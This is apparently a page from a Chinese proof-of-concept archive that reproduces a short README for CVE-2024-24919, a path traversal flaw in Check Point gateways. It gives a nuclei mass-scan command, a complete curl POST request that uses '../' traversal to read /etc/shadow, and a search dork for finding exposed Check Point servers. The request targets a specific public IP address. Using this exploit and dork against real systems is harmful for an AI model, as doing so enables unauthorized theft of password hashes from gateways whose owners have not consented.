关联漏洞
介绍
<h1>Check point:CVE-2024-24919</h1>

<h1> run CVE </h1>
```
nuclei -list chick.txt -t CVE-2024-24919.yaml
```
<h>Replace <ip> with the target IP address, and this command will attempt to access the /etc/shadow file, which contains password hashes.</h>
```
curl --path-as-is -i -s -k -X POST \ -H 'Host: 117.102.198.7 ' \ -H 'Content-Length: 39' \ -H 'Connection: keep-alive' \ --data-binary 'aCSHELL/../../../../../../../etc/shadow' \ 'https://117.102.198.7/clients/MyCRL'
```

<h1>Dork: "Server: Check Point SVN" "X-UA-Compatible: IE=EmulateIE7"</h1>
文件快照
[4.0K] /data/pocs/c68149589700f59fafed2963e3c8857f59053e7d
├── [3.9K] CVE-2024-24919.sh
├── [1.1K] CVE-2024-24919.yaml
└── [ 780] README.md
0 directories, 3 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。